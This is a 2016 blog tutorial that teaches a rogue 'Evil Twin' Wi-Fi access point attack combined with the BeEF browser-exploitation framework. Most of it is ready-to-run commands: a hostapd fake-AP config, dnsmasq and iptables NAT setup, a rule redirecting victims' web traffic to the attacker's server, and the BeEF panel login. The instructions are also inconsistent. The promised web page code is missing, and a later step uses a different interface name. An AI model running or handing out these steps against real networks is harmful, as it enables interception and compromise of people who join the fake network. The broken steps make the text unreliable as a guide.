August 2, 2016
Using Wireless Evil Twin and BeEF to Compromise Target Machines
I'm the author of Infernal Wireless Suite. Today, I'd like to teach you how to perform an Evil Twin attack, along with utilizing the BeEF Framework to compromise a target machine during penetration tests or red team exercises.
First thing first, what is an Evil Twin attack?
An Evil Twin attack is when you impersonate a wireless access point and lure probing devices into connecting to you. You then act as a legitimate access point, providing internet access through your own internet-facing interface. Any victim connected to your fake access point is subject to data interception. More information can be found here: https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)
Second, what is the BeEF Framework?
Now, as the title implies, I'd like to show you one of the attack vectors I implemented in my tool, Infernal Wireless, and how to do it manually.
This tutorial is only for educational and professional use.
Please don't use for illegal purposes!!
My network cards are as follows:
wlan0 - wireless interface name; yours might be different, replace if needed
eth0 - internet-facing interface name; yours might be different, replace if needed
Preferred OS: Kali Linux
Install: hostapd, dnsmasq, BeEF Framework
First, we need to create a fake Access Point with a desired name.
Step 1: Create a configuration file for hostapd
Type the following into free_AP.conf and save it (hostapd does not accept trailing comments on a key=value line, so the comments are kept on their own lines):
# wireless interface; change this if it differs from yours
interface=wlan0
# your access point name
ssid=<fakeAPName>
Then start hostapd with this configuration:
hostapd free_AP.conf &
Step 2: Configure DNS Settings:
From a command prompt, execute the following (the heredoc must be closed with EOF, and the comment is kept on its own line):
sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd
cat <<EOF > /etc/dnsmasq.conf
# this is your wireless interface, change if different
interface=wlan0
EOF
service dnsmasq start
Step 3 - Set up NAT Table:
Execute the following from the command line:
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
Step 4 - Set up BeEF and HTTP Service:
From the command line, or by any other means you have, enable the HTTP service.
Create index.html under your web root, i.e. /var/www/html/index.html, and write the code below:
Step 5 - Additional iptables setup:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE
Step 6 - Launch BeEF Framework:
From the command prompt, execute this:
firefox http://127.0.0.1:3000/ui/panel &
Login credentials are beef:beef
Now it's just a matter of waiting until someone connects to your network.
The demo video can be seen here: https://www.youtube.com/watch?v=pVY5azLJMPY
If you want to use the automated tool that I created, you can download it here: https://github.com/entropy1337/infernal-twin